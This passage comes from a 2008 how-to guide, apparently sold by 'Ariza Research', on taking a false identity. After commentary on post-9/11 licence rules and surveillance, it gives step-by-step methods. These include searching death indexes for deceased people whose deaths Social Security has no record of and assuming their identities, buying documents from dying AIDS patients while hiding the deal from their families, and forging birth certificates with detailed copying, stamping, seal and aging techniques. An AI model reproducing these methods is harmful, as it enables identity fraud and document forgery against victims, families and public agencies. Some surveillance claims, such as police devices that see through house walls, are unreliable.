terrorists hit us again – all bets are off. We might +very well awaken some morning to ourselves living in a totally +monitored high-tech police state – thanks to Osama bin Laden. +Now is the time to protest these developments and crush this +evolving police state before it becomes a fact of life. Write your +representatives today and let them know exactly where you stand. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 20 - +Reproduction in any form is prohibited without written permission. + +Post 9/11 Update +Before 9/11 Immigrant identification cards issued by the US +State Department couldn't be verified online - except by the +INS at border crossings. The INS verification process +couldn't be performed online which meant that any immigrant +could wander into a DMV almost anywhere in the country +and easily obtain a new drivers license. The clerk was forced +to fly blind. +And since high-quality immigrant identification cards are +widely available on the black market in any large +metropolitan area, immigrants could obtain drivers licenses +quite freely. +In addition, many states had a glaring loophole that the 9/11 +terrorists used in the state of Virginia. Under the old rules +you could "prove" your identity by simply producing a signed +statement from a licensed resident that verified your identity. +This loophole is now history. +The good news here is that most of the new restrictions +being discussed are aimed squarely at illegal foreign +immigrants. The state department has now been funded to +come up with an online system for instantly verifying +immigrant documents. +In addition, many states are now limiting immigrant driver’s +licenses to a term of only one year. Also, the license they +issue to immigrants will be in a different format and color +than the license American citizens are issued. +This way the immigrant must appear annually and submit to +a mandatory immigration status review or lose their license. +In the past once an immigrant gained entrance into our +society through a student or work visa, they could, with +impunity drop out of school, ignore our immigration laws and +remain in the US indefinitely. No more. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 21 - +Reproduction in any form is prohibited without written permission. + +In some states immigrants may have to wait several weeks +or longer and have their licenses mailed to their home +address. This would allow time to verify their immigration +status with the INS and also help the INS keep track of their +precise whereabouts - a task that went largely ignored until +now. +The INS identity cards themselves (which resemble driver’s +licenses) are being altered also. New anti-forgery features +are being added. Though this seemed like a good idea at +first it's backfired a bit. Now there are many different kinds of +identity cards in circulation. +While the newer cards are indeed more difficult to forge, this +change has created a great deal of confusion in the minds of +those who must screen them. +When you stop to think about it - our driver’s license situation +is rather unique. Most countries have all their drivers +licenses issued from a single centralized federal authority. In +the US our drivers licenses are issued by the individual +states and each state continues to have it's own issuing +standards. +And yet the document itself is, under law, accepted +nationwide. Once you've managed to obtain a single drivers +license in one state - you're in - as you can very easily +exchange it for another license anywhere in the country. +Though there are federal laws and rules in the works that will +tighten application requirements somewhat, there still +appears to be little chance that the federal government will +impose strict national application standards anytime soon. +Many states are moving toward a points system that would +assign point values to various identity documents. Should +you have a verifiable drivers license from another state, that +would equal 100 points which means you would get your +new license no-questions-asked. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 22 - +Reproduction in any form is prohibited without written permission. + +A birth certificate might earn you fifty points, a library card +another 25, an ATM card another 20, and a signed +apartment lease might be good for another 10. If the hurdle +is put at 80 points, you simple assemble the required +documents and you're home free. +In some ways this system would actually make the +application process easier to manage. It would reduce the +previous confusion and make the application process much +more predictable. +Actually this point system is much better than the old more +intuitive system where the clerk went with their "gut feelings". +Now if you have the right documents, which earn the +required points - the clerk must accept you no questions ask. +In most cases you can get all the information on their system +online, or through a simple phone call. (Remember, you +have just returned after working for ten years plus for +Aramco Oil in the oilfields of Saudi Arabia - which explains +why you have no previous US drivers license) +Strangely, the social security number isn't much of an issue +here. Most of the 9/11 terrorists had genuine fully verifiable +social security numbers and cards. Had their numbers been +checked - they would have cleared the process with no +problems. Many states DMV clerks still can’t check social +security numbers online. +Because of new privacy laws, many states don't even bother +to ask for the numbers (several DMV clerks have been +arrested after selling personal applicant information to +identity thieves). Texas and Utah are two examples. And the +old practice of using your social security number as the +driver’s license number is slowly being eliminated. +Several other states such as Ohio and Alabama ask for and +record the social security number in their records but don't +include it on the license itself and can’t verify it online during +the application process. +Biometrics +There's been much discussion in the US media concerning +the use of biometrics on licenses. The fear is that we'll end +© Copyright 2008, Ariza Research, All rights reserved - ABP - 23 - +Reproduction in any form is prohibited without written permission. + +up with a system where the government can track our every +move and every transaction through the use of our +fingerprints or our facial profile. Most Americans view these +new technologies with outright horror. +Imagine a new surveillance system that's hooked up to a +wide range of different databases. A video camera atop a tall +pole detects your car’s movement, which triggers it to zoom +in on your license plate. The number is run through the DMV +records and your entire DMV record suddenly flashes up on +the monitor screen. The computer behind the cameras then +creates a “trip file” which will contain many details on your +journey. +As you leave the camera’s area, the computer prompts +another camera to track and record your movements. As you +drive your trip is carefully recorded in the computer’s +records. +When you park your car across the street from a store the +camera there watches as you leave your car and stroll +across the street. If you stop to chat with a friend, that fact is +also recorded along with your friend’s identity. +You then enter the store and make a purchase. Of course +the details of your purchase are recorded in your trip file. As +you walk back to your car your path is carefully recorded and +analyzed. Should you stop along the way the monitoring +computer may label your activity as “suspicious” and contact +the local police to send a car to check you out. +Sound like some wild science fiction fantasy from the far +distant future? Think again. The first such system is up and +running in several cities in England. Here in the US we're not +quite so comfortable with such a system so we’re going to +“go slow” on the use of such invasive technology. +In England the government loves their new system. They +claim it’s cut crime in the most heavily monitored areas by +more than half. But what they don’t tell you is that all that has +really happened is that crime has moved away from the +monitored areas. In the unmonitored areas crime has +exploded. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 24 - +Reproduction in any form is prohibited without written permission. + +Privacy groups and the ACLU have pressured the federal +government to restrict such "big brother" systems so +hopefully this technology will stay across the pond. +What’s the state of the art in monitoring technologies? By +combining several different technologies the police now have +several units that can provide a level of intrusion that is truly +mind-boggling. +The cop sits in the passenger seat of a standard police car +while his partner drives. In his lap is a powerful laptop +computer with a large display. As he drives past your house +he points a large black gun-like device at the front of your +house. +An image pops up on the screen. It’s a razor sharp image of +the inside of your house. It can watch you as you move +around your house. With this breakthrough technology they +can determine if you’re committing illegal acts. They can also +watch as you have sex. They can also watch as your +daughter changes her clothes. +Not only can they watch you inside your home, they have a +system in development that can actually identify you using +facial recognition technology (FRT). With this emerging +technology they’ll be able to determine how many people are +in your home and at the same time identify them by their +facial traits! +The trend is clear. If we don’t force our representatives in +Washington to come up with an iron-clad privacy bill, it’s only +a matter of time before our entire lives are an open book. +Driver’s License Developments +But there are some changes that will make it a bit more +difficult to obtain a new drivers license. Notarized copies of +documents may not be acceptable now. Certified copies will +probably be required. +Clerks are being given updated training to help them +recognize forged documents. (but given the thousands of +© Copyright 2008, Ariza Research, All rights reserved - ABP - 25 - +Reproduction in any form is prohibited without written permission. + +different birth certificate formats in use - training no matter +how thorough won't help much) More anti-forgery features +will be added to newer licenses. +Mexicans are now routinely fingerprinted when they attempt +to enter the US. Should that same individual attempt to +illegally re-enter the US they will be instantly turned away. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 26 - +Reproduction in any form is prohibited without written permission. + +Chapter 2 +The "Internet" Method +This is by far the fastest and most effective identity changing +system around. We hate to admit it but this system is +somewhat simpler than our older original system that we’ve +been using since 1995. And it can be done without leaving +the privacy of your home! +Find an “Old” Identity +Under this new system an individual would find an online death +database for a particular state. As you will see, many people born +in one state tend to die in another. (birth and death records are +only cross referenced within individual states) +For instance, the California death index can be found at: +http://userdb.rootsweb.com/ca/death/search.cgi +(If you can’t find this particular URL – do a search in any major +search engine (Google is our favorite) under “California death +index”. The index can be found at numerous places around the +web.) From time to time the database is down for maintenance or +updating. If it won't come up, wait a day or two and try again. +A search is then done to locate a half dozen or so deceased +individuals who meet the following criteria: +1. Birth date is within two years of your actual birth date +2. Death occurred before 1988 +3. Has mother’s maiden name listed +4. Is of the same ethnic group as yourself +5. Not born in California (unless you’re Hispanic) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 27 - +Reproduction in any form is prohibited without written permission. + +6. No SSN number listed +The relevant information is then written down. +Full Name (including middle initial) +1. Birth date +2. Birth place +3. Date of death +4. Death location +5. Mother’s maiden name +You shouldn’t just jump on the first few surnames you find that +begin with the letter “A”. Take the time to find others farther along +the alphabet. +Does Big Brother Know They’re Dead? +Once an individual has this information recorded, the next step is +to determine if the death of these persons has been properly +recorded. This information can be found at: +http://www.ancestry.com/search/rectype/vital/ssdi/main.htm +(Once again – if you can’t find this particular URL – do a search in +any search engine under “Social Security Index” or (SSI death +index)”. The index can be found at numerous places around the +web. +Next a search is performed in this index to see if anyone reported +these deaths to the social security administration. Discard any +names that have been registered as deceased. The social security +people were notified of their deaths. +A search is done by last name alone, then last name and first +name and then first and last name with middle initial just to be +sure they’re not recorded in the database. Sometimes the exact +name might come up blank, which can be misleading. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 28 - +Reproduction in any form is prohibited without written permission. + +On average if you start out with a list of six names two or three +won't have their deaths recorded. If not, start over again using a +different group of names. +Criminal Check +Some individuals chose to pursue other optional checks. For a fee +a criminal check could be run. They only did this with individuals +who lived to be over age 16 or so. There would be little chance +that a person younger than 16 being involved in criminal activity. +The identity of an established criminal is worthless for any +purpose. +Legal Name Change +The next step in this system involves changing the name of your +"old identity" (the name you located in the various databases). +There are two ways to approach having the name changed. We +prefer the name change “kit” approach. +These kits can be found in many places on the Internet if you look +around. Firms sell kits for all sorts of legal purposes (divorce, wills, +bill of sale etc..) This seems to be the cheapest and simplest way +to perform a legal name change. +Or you can approach a lawyer to have your name legally changed. +The lawyer will, of course, cost you more but he may be able to +help you get things done more quickly (and quietly). +There are a number of legal reasons why someone might want to +change their name. Those disowned by a recently deceased +parent may want to change their family name. Despite leaving a +substantial fortune, a disowned person receives nothing. Siblings +are often also hostile. In this situation anyone would want to sever +all family links and live out their lives under a new name. +Those who have legally changed their names have done so in +rather remote places where they haven't lived too long. Under law +the name change will remain in the court’s records. Any +investigator will have to know in exactly what location the name +was changed if they wish to locate the official legal records. +If you change your name in your hometown, you’ll be making it +very easy for a snoop to discover what you’ve been up to. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 29 - +Reproduction in any form is prohibited without written permission. + +But the cleverer name changers are those who chose to perform +the name change in some remote state where the residency +requirements are less of a problem and no one would ever think of +looking. +Of course, the legal requirements for name changes and their +rules regarding how and where records are maintained vary +widely from state to state. Some states require exhaustive +background disclosures, court investigations, minimum residence +requirements or personal references. +The laws may even require that your personal references appear +in court where they can provide their input under oath. +While other state's laws are much less restrictive. Some states +maintain a statewide database of name changes, which can be +easily searched. The states listed below that include "local records +only" would be those that afford the greatest degree of personal +privacy. +It's best to at least consult with a local attorney to be sure that +your name change will be processed without any problems and +that what you're doing doesn't violate any local laws. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 30 - +Reproduction in any form is prohibited without written permission. + +Typical Legal Name Change Application Form +(Your name) (Address) (Telephone) +In Proper Person +DISTRICT COURT ______________________COUNTY, +NEVADA +In the Matter of the ), Application of : ) +for Change of Name ), +ORDER FOR CHANGE OF NAME +This matter having come on for (circle one) hearing/summary +disposition in the Family Division of the ____________ Judicial +District Court, County of ____________ and the Court being fully +advised in the premises, both as to subject matter as well as the +party thereto, and that jurisdiction is proper in Nevada, and good +cause appearing therefore; +IT IS HEREBY ORDERED that Petitioner’s name be changed +from __________________ to _________________. +IT IS FURTHER ORDERED that the Dept. of Vital Statistics shall +issue a new birth certificate for Petitioner with the name +of:_______________. +DATED this _______ day of __________, ____. +DISTRICT COURT JUDGE +Respectfully submitted: +(Your signature) ___________________________ +(Your name) _________________________ +© Copyright 2008, Ariza Research, All rights reserved - ABP - 31 - +Reproduction in any form is prohibited without written permission. + +(Address) _________________________ +(Telephone) __________________________ +To the best of our knowledge the states listed below have less +restrictions than others: (however be aware that laws can and do +change) +Most Liberal States for +Legal Name Change +State Details +Alabama Records kept at county level +Arizona Performed at each court +Arkansas Performed at each court +California Four week waiting period +Delaware Performed at district court level +Idaho Laws are unclear +Indiana Laws are unclear +Kentucky Records kept at county level +Maine Performed by probate court - Lawyer required +Performed at circuit court - Lawyer not +Maryland +required +Mississippi Laws are unclear +Performed at circuit court - 20 day waiting +Missouri +period +Montana Local records only +Nevada Performed at district court +New +Performed at probate court +Hampshire +New Jersey Local records only +Rhode +Probate court - Lawyer may be required +Island +Tennessee County or probate court - local records only +Texas Local records only +Washington Local records only +© Copyright 2008, Ariza Research, All rights reserved - ABP - 32 - +Reproduction in any form is prohibited without written permission. + +Once the court has certified the legal name change, you can take +the papers to the social security office. The social security people +have a rather simple name change form. A computerized +statement is then generated that documents your name change in +their records. You will then be issued a new social security card. +According to social security procedures, this is a very routine +procedure that seldom causes any problems. The social security +people respect court actions and assume the court followed +established procedures so the whole thing is proper and entirely +legal. +At this point an individual would have a new name attached to an +old abandoned social security number. Those who have used this +system report that it's security rests in the fact that dead men tell +no tales. +Some individuals find it useful to have a new birth certificate also. +There are two approaches here. Some find it useful to use the +forgery techniques reported below. This tactic is fine except that if +an individual wanted to apply for a US passport at some point in +the future, a birth certificate that can be verified in the official vital +records files will be required. +Some have used the following process that can be performed +entirely through the mail. Send a letter to the vital records office. +We have received reports that the best states are Nevada, +Colorado, New Mexico and Ohio. These are the best states as +they are the only ones that "seal" the old birth certificate and issue +a brand new one. (Many other states just append the new BC, +which can get complicated) +The vital records office will have a form that is submitted along +with your court legal name change certification. A new birth +certificate is routinely issued in the new legal name. Again, this is +a normal procedure that can be easily done provided the proper +papers and forms are submitted. Some have found it useful to +have an attorney perform this function for them. +Under this system the next goal would be a new driver’s license. +Many have started by finding a local driver’s education firm where +they took some lessons. +If asked why they haven't learned to drive, they simply said they +lived in New York City (where few people own cars) or have been +working in a far off land such as Saudi Arabia. (The author of this +system reports that it's useful to have an international drivers +license issued by the AAA office to support the claim of overseas +employment.) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 33 - +Reproduction in any form is prohibited without written permission. + +Some have found the drivers’ education graduation certificate is +widely recognized and respected by those who process drivers’ +license applications. +What About any Possible Debts? +it's possible that someone died and left considerable debts +behind. Due to credit rating agency rules, any debt over ten +years old should be long gone and forgotten. Some have +found it useful to run a test just to be sure. Few have found +any record of debts though it's certainly not impossible. +If there is a file listing some old debts (credit agencies are +supposed to purge records more than 10 years old but +sometimes neglect to bother) those records can be +challenged and erased under the requirements of the fair +credit-reporting act. +These old debt records can usually be cleared away with a +simple phone call. This is a routine problem that is usually +quickly resolved. To be sure the requested changes are +done the law allows an individual to ask for a printed record +of the clean new credit file. +The major credit reporting agencies are: +Equifax +www.equifax.com +Report fraud: 1-800-525-6285 +Order a credit report: (800) 685-1111 +P.O. Box 740256 +Atlanta, GA 30374-0241 +Experian +www.experian.com +Report fraud: 1-888-397-3742 +Order a credit report: +(888) EXPERIAN (397-3742) +P.O. Box 1017 +Allen, TX 75013-0949 +Trans Union +www.tuc.com +Report fraud: 1-800-680-7289 +Order a credit report: (800) 916-8800 +Fraud Victim Assistance Department +P.O. Box 6790 +© Copyright 2008, Ariza Research, All rights reserved - ABP - 34 - +Reproduction in any form is prohibited without written permission. + +Fullerton, CA 92834 +If you look around the web you'll find several sites that will, for a +reasonable fee provide you with a computerized report that +combines credit information from all three major reporting +agencies all on one easy-to-read form. I'd give you a URL but +these outfits move around a bit. +Users of this system report that at the end you have a new name, +new social security number and a new drivers license in a new +name. If anyone checks, the social security number, birth +certificate and drivers license will all be fully verifiable and properly +recorded. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 35 - +Reproduction in any form is prohibited without written permission. + +Chapter 3 +The "Living Dead" Method +Today more people than ever are seeking to change their +identities, so it’s inevitable that new approaches would +emerge from time to time. Such is the case with the new +"living dead" technique. Someone spent considerable time +and effort coming up with this inventive system. +In the ebb and flow of human history situations occur that +create opportunities that are often mutually advantageous for +both the individuals involved. With this new approach +anyone who desires to obtain a new identity can simply +purchase one from an individual who is near death. Sadly +the AIDS epidemic is providing a large and growing pool of +doomed individuals that find themselves in desperate +financial straits. The purchaser gets the new identity +documents they need while the donor gets badly needed +financial help for himself and his family during his final +months. +It all starts with a classified ad similar to the following: +Wanted: Caucasian male age 30-40, dying of AIDS or +other terminal illness – Generous cash fee paid Call 555- +1234 +For around $500-1,000 cash an individual can purchase a +full set of ID documents that supports an already established +identity. But like the other identity changing systems I've +reported on, there are flies in this ointment. This whole +approach has some unique advantages but also presents +some rather unique obstacles. +First is the issue of body similarity. The identity donor should +be somewhere around the same height/weight and age as +the purchaser. A few inches or years here or there won’t +matter much. Eye color is another issue though much less +important than body type. (too much variance could present +© Copyright 2008, Ariza Research, All rights reserved - ABP - 36 - +Reproduction in any form is prohibited without written permission. + +a problem) though small differences could be masked with +tinted contact lenses) +Obviously it would be ideal if your donor had a somewhat +similar facial appearance or at least a face with an overall +shape similar to your own. Under this system it's not +necessary to find an identity donor who looks exactly like the +purchaser. The driver’s license picture will be an entirely new +one. +The ideal donor would plan to have their body cremated and +their ashes scattered thus avoiding the existence of a +gravestone, which would allow others to share the identity +using the tired old "dead infant" system. If the identity donor +is resistant to the idea, the identity purchaser might offer to +pay for the cremation and/or even offer to scatter the ashes +in some particular spot as an incentive. (be sensitive +however that for theological reasons some religious +individuals may be resistant to the idea of cremation) +Under this system any agreement between the identity +purchaser and donor must be kept an absolute secret. The +donor's family is to know nothing of the transaction - that is +vital or the whole system falls apart. The donor must agree +from the very beginning. +The fee the purchaser provides should include the $300 fee +the social security administration routinely pays the family to +register the deceased as officially dead. (the so-called "death +benefit") Remember, no one is truly dead until the social +security says they are. Obviously it’s in the purchaser's +interest to be sure the death is never officially recorded. +The author of this system reports that the credit reporting +agencies routinely search the social security death index and +attach a note to the credit file which would then be sent out +to anyone who requests a copy of the donor's credit file. +If a family member should return any kind of official +document to any agency, it would compromise this whole +system. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 37 - +Reproduction in any form is prohibited without written permission. + +The ideal donor would be born in a state different from the +state in which they die. Users of this system report that some +counties are cross-referencing birth and death records. +In most cases the donor will have a spotless legal history but +you should ask just in case. Some found it desirable to +perform a criminal records search just to be sure. +The author of this system reports that a search can be easily +done by claiming that the search is a routine pre- +employment check. (A check will cost around $50 - $100). If +the donor is a known drug dealer or has some other criminal +record, move on to other donors. +Users have reported that under this system even a few +speeding tickets could make it difficult to obtain a drivers +license. A donor should also be asked about their driving +record. +About money – terminally ill patients often let their credit +ratings fall apart as they ignore all but the most pressing +bills. The purchaser should ask (or require) that your donor +provide a recent copy of their credit report. The donor should +provide a list of all outstanding debts. Or the purchaser could +spend a few bucks and obtain a copy of the donor's credit +file. +If all goes well, the purchaser should now have a full set of +identity documents in hand. Of course the photo on the +drivers’ license is going to be the donor's. Some have found +a simple way to get around this problem. They have gone to +their local drivers’ license bureau and reported their driver’s +license as being lost. The standard policy is to issue a new +license, which will, of course, involve the taking of a new +photo. +The author reports that some driver’s license bureaus now +call up an image of the license holder and compare that +image with the applicant. Some individuals have found it +useful to have a friend go through the license replacement +process to learn the details. +Some states allow individuals to report their lost licenses by +mail or even on the phone. Many identity purchasers have +found it useful to pursue their new drivers’ license in another +state, which will probably avoid the image comparison +© Copyright 2008, Ariza Research, All rights reserved - ABP - 38 - +Reproduction in any form is prohibited without written permission. + +problem. As they now have a full set of ID, they should have +no problems with the replacement application. +Users of this system warn that identity purchasers should +leave all their old identity ID at home. Most government +offices now have armed guards who will retain and question +applicants if the clerk doesn’t like the look of the applicant's +ID documents, the sound of the story or the applicant's +overall appearance and attitude. +Be aware that the clerks in these places see a regular +stream of alcoholic applicants who attempt to obtain a new +license after losing their old ones due to excessive DUI +convictions. Dressing and acting like a clean, respectable +person is a necessity. +Some have found it useful to pursue another option. Once +the purchaser has been living under the donor's new identity +in a new location for a year or so, they might want to legally +change their name. +If an individual can locate a good clean donor, this system +has potential. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 39 - +Reproduction in any form is prohibited without written permission. + +Chapter 4 +The Classic “Ariza” Method +1. The "Quick and Easy" Way +This system involves creating a forged birth certificate and a +matching forged baptismal certificate with which other +identity documents can be obtained. While this approach is +very quick and has been used to obtain a new drivers +license, unfortunately it produces an identity that won’t stand +up to close scrutiny. +Anyone with ten bucks can discover that the forged birth +certificate is a fake. Because a verifiable birth certificate is +needed to obtain a new social security number, you won’t be +able to get a legitimate "on the books" job under your new +name. If you don’t have to work for a living or don’t plan to +travel internationally AND have money, someone else who +supports you or are employed in the cash "underground" +economy or work as a "contractor" (your wages are reported +on IRS form 1099 not on the usual W-4) then this system +might be useful. +2. The "Slow and Hard" Way +Then there’s the much more comprehensive method which +requires homework, creativity and some time. It involves +doing research to find a suitable set of parents (dead of +course) and then generates a completely new identity that +will include the issuing of a genuine, verifiable birth +certificate including it’s placement in the official records. +This method will create an entirely new identity that will +stand up to close scrutiny and will allow you to obtain a new +social security number and even a genuine passport. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 40 - +Reproduction in any form is prohibited without written permission. + +3. The "Combo" +And lastly, there’s the combo - a combination of the "quick +and easy" and the "slow and hard" approaches. With it you +do the research required to find two new parents. You then +forge a birth certificate and baptismal certificate in your new +name. +You get your drivers license quickly and then begin the time- +consuming process of getting all the paperwork going to +construct the rest of your completely new identity. +"Quick +"Slow & +& "Combo" +Hard" +Easy" +Drivers +Quick Slow Quick +License +Social +Make +Security Genuine Genuine +One Up +Number +Social +Make +Security Genuine Genuine +One Up +Card +Birth +Forged Verifiable Verifiable +Certificate +Employment Difficult Yes Yes +Credit Cards Maybe Yes Yes +THE "QUICK AND EASY WAY" +First make a copy of your genuine birth certificate. It can +then be photocopied and doctored quite easily. The larger +copy centers usually have a helpful clerk behind the counter +who can make much higher quality copies using the big +expensive systems. Even higher qualify copies can be +obtained by asking the clerk to please clean the glass before +making copies. +Some have volunteered that it's best to visit the copy center +during the slower nighttime or early morning hours as the +© Copyright 2008, Ariza Research, All rights reserved - ABP - 41 - +Reproduction in any form is prohibited without written permission. + +crowd is smaller and the service faster and more +comprehensive. +This section of this system comes from a professional forger +called "Nifty" (a reference to the appearance of his +documents) He advises the purchase of a bottle or two of +"White Out" or "Liquid Paper" that’s labeled "For Copies". +He also recommends using some of those sticky cover-up +strips made by the nice people at Avery label. They come on +a roll like scotch tape or in a flat pack. +Nifty prefers the flat pack with a width of around 3/16th of an +inch.(though you can buy the wider strips and just trim them +down with good sharp scissors) A very sharp knife and a +good pair of scissors will come in very handy. Most people +who attempt forgery need a good magnifying glass. +The initial goal now is to create a completely blank birth +certificate form from one of your copies. Do this by covering +up all the data typed or written into those little blocks. Use +the cover-up strips to cover both typewritten and hand- +written entries. Leave the signature on the bottom alone. If +there’s a shadow image of a raised seal, cover it up +completely. +Try not to leave any typing behind. You’ll have a real +problem matching any new typewriting to the older typeface. +According to Nifty - mismatched typefaces are the single +most obvious sign of a forgery to anyone experienced in +spotting fake documents. +You should now have an absolutely clean, blank form. This +can be tricky when some of the typing or writing crosses a +line that’s part of the form. Usually the careful placement of a +cover-up strip will do the job but you’ve got to be very careful +to make the job look professional. Don’t cover up any part of +a line that was on the original form. +You may blow the first attempt, that’s normal. That’s why +several copies of your original birth certificate may be +needed. Once in place, paint the ends of the cover up strips +with whiteout. This will help to reduce the possibility of +shadows of the ends of the strips appearing on copies of the +new blank form. +If this happens anyway, reduce the darkness level on the +© Copyright 2008, Ariza Research, All rights reserved - ABP - 42 - +Reproduction in any form is prohibited without written permission. + +copy machine until they disappear completely. These little +shadows are another important sign of an altered document +so you can’t afford to ignore them. +Another tip from Nifty - put a dot of the "Liquid Paper" on any +little black specks that might appear on your copy. You want +to cover up all the little dots, smears, and lines etc. that +aren’t part of the original form. Remember, we’re shooting +for the cleanest, most original looking form possible. It won’t +appear flawless but then most genuine birth certificates are +far from perfect. +Return to the copy center. (Take a jar of "liquid Paper" along +for last minute touch-ups.) This time forget the guy behind +the counter. (Privacy is important now) It's best to use the +cheaper self-service machines. Make a single copy of the +cleaned-up certificate with the darkness control set in the +middle of the range. Take a very good look at it. Hold it up +and let the light pass through from behind. Does it need any +touching up? Are there any signs of the cover up strips on +the copy? +Crank up the darkness level until your cover up work starts +to show, then back off just enough to give you the darkest, +crispest form possible with absolutely no sign of doctoring. +If your original BC was reduced to a smaller size, choose an +enlarger copier and blow up the copies as large as possible +without going off the edge of the paper. You can reduce it’s +size later after it’s been filled in with new information. +Make several copies of the new blank BC. Does it look +good? If the lines on the form are not straight and clean, try +another copier or you may have to return to the clerk behind +the counter for a higher quality copy made on one of the big +machines. Nifty says to choose a different clerk than you +used on your first trip. Going there at a different time of day +will usually assure that you’re dealing with a new crew or use +a completely different copy center. +The next step requires a typewriter - preferably one from +around the time you were born. Only use a modern electric +typewriter if you were born after the late 1960s. Otherwise +© Copyright 2008, Ariza Research, All rights reserved - ABP - 43 - +Reproduction in any form is prohibited without written permission. + +modern type quality would appear unusual on an older +document. If you're older than that, you’ll need an older +machine with uneven even blotchy type. Libraries usually +have old typewriters for rent very cheap. Or an older +reconditioned unit could be found at an office supply center +or one might be for rent at a larger copy center. +But many have found just the right machine at a swap meet +or flea market. On one recent Sunday we found three +suitable old manual portables at a local flea market. The best +one went for a whopping five bucks. (an Underwood from the +late 1950s). An old machine will probably need a good +cleaning and a fresh new black ribbon. +Some have simply looked in the yellow pages for the largest +used typewriter dealer in town. They often deal in +reconditioned old typewriters. +They won't be out on display but may instead be found on +some bottom shelf somewhere as they aren't all that +profitable an item for the store. +A dealer will doubtless charge more than the flea market but +you won’t have to wait for the next flea market meet. Either +way you get the old-fashioned uneven looking typestyle that +will make any old document look good. Don’t worry if one or +two of the characters don’t print just right, that’ll just make +the BC look that much better! +Nifty says that if your original BC includes a rubber stamp +that says something like "Certified Copy" or "Registered +Copy" - cover it up except for the certifying signature. +Leaving the stamp and signature "as is" is the quickest +tactic. But if you want to do it right you’ll mask out the stamp +and replace it with a more official looking "Certified Copy" +stamp in purple ink which will make your birth certificate look +even more genuine. +Any large rubber stamp store will have many of the same +old-fashioned typefaces like the stamp image on your +original BC. Again, the phone book is the best place to look. +Ask to choose the font/typeface and pick one that’s old- +fashioned looking and as close as possible to the original +stamp. +Pick up the stamp and buy a bottle of red stamp ink, a bottle +of blue stamp ink (dark blue or blue-black) and an inkless +© Copyright 2008, Ariza Research, All rights reserved - ABP - 44 - +Reproduction in any form is prohibited without written permission. + +stamp pad (look inside the pad - it’s surface should be made +of clean white cloth). Before you leave, ask if they sell +corporate seals. Most larger rubber stamp firms do. +Two more details to go; it’s been a common practice for +several decades to use dark purple ink for the certification +stamp. +It’s supposed to make the document more difficult to forge. +But by mixing equal portions of blue and red ink you can +create exactly the same color! +Mix the two inks well and pour the mixture over the white +stamp pad. You may have to add some black ink to the mix +to insure that the color of the impression is not too bright. +The ink on old documents often fades leaving a purple +impression rather dark. +Place the stamp at the same location as it appeared on the +original (probably above the verifying signature). If your +impression image isn't clean and crisp - it's not a problem as +most real BCs have smeared or incomplete stamps. One +note here: a completely perfect BC will seem odd and out of +place. +A birth certificate has no legal value at all without an official +"raised seal" that can be felt with the fingertips. This is +supposed to make the document impossible to forge as only +the issuing authorities have the proper seals. As always Nifty +has the answer. +The quickest and easiest approach is so simple it’s actually +funny! Go to a bank or coin store and buy an Eisenhower +dollar, Kennedy half-dollar or any other coin of that +approximate size. Be sure the coin you get is in uncirculated +condition or has little wear. Place the coin face down on a +firm surface, place the BC over the coin with the original seal +location placed directly over the coin. +Then rub the front surface of the BC with an eraser, your +finger or any other clean, soft object until a raised image +starts to appear on the BC. Keep rubbing until the full rim +and some of the center image appears. Most state laws only +require that the seal can be easily felt, not actually read. In +fact, most real BCs have very low-quality unreadable seal +images. Years of storage usually crush seal images, which +© Copyright 2008, Ariza Research, All rights reserved - ABP - 45 - +Reproduction in any form is prohibited without written permission. + +causes them to lose their sharpness and clarity leaving them +little more than a slightly raised smudge. +Avoid rubbing on the coin's lettering. The words "One Dollar" +would never appear on a real BC. Be sure you concentrate +only on the rim and center of the coin - this leaves a nice +round circular impression with a fuzzy image in the center. +This simple technique will create a seal that will pass most +inspections (in fact, some clerks often forget to look for the +seal at all - most clerks will give the seal only a cursory +glance so readability is seldom an issue). Several genuine +birth certificates I've seen have seal images that are a circle +of little dots with a mushy image of some sort in the middle +with no legible text of any sort. +Some people are fussier demand a higher quality job. They +go back to the rubber stamp guy. If he sells corporate seals, +he'll have a catalog of different images that are available. +If you live in a large city and the stamp manufacturer is a big +outfit, a dozen or so seals will be hanging on the wall, +available for instant purchase. Otherwise you'll have to wait. +A nice large seal with no text can usually be purchase right +off the wall. Some designs look just like state seals. The cost +shouldn't be more than 20 or 30 bucks. Birth certificates +almost never have seals smaller than a half dollar with silver +dollar sized seals being the most common. +Seals the size of a quarter are commonly used as personal +seals that would appear very unusual on any official +document. When you use such a seal, place a few sheets of +paper behind the BC so that the image isn’t too sharp. Some +have found it useful to rub the resultant seal a bit to avoid it +looking too sharp. +The typewriter (whether old or new) can now be used to +enter information in the blanks on the blank BC form. Those +who have used this system recommend not using your real +birth date. Anyone who investigates your new ID will use the +date of birth (DOB) when searching databases. +To make your new birth date easy to remember, simply +move it backward or forward one month from your actual +birth date. Also, resist the temptation to make your new +© Copyright 2008, Ariza Research, All rights reserved - ABP - 46 - +Reproduction in any form is prohibited without written permission. + +identity younger than you really are. I know - I know, you +look younger than your age (everybody says that!). Trust +me, this could cause you problems later should it trigger +suspicion. +Enter the data about your new parents. (More on how to +locate your new parents later in the report) +Remember old documents had phone numbers like +"Evergreen 2-1234", not the seven digit phone numbers we +use today. No area codes, no two letter state abbreviations +and no zip codes as all these only came into widespread use +in the 1970s. An address from the early 1950s might look +like "Miami 8, Florida" instead of today’s "Miami, FL 33068". +Unfortunately your new document will appear fresh and new. +To make it suitably old and weathered some have found it +useful to age the document by either leaving it out in the sun +(if it's in the summer) or lay it on a car seat or on a sunny +window sill during the day. This works well even in the +winter. Failing that you can use a sunlamp. (Don’t forget to +age both sides) +As a last resort, you can fire up your oven to around 300-325 +degrees and bake your BC for about 20-40 minutes. Cook it +in until it’s suitably aged. Some people have soaked the BC +in vinegar or tea to discolor it slightly. This last trick is so +common that some experienced clerks will actually sniff a +BC to see if they can detect the odor of coffee or vinegar. +Nifty recommends one last bit of trickery - brush the +document with some very fine steel wool, which will help it +look older also. +Fold 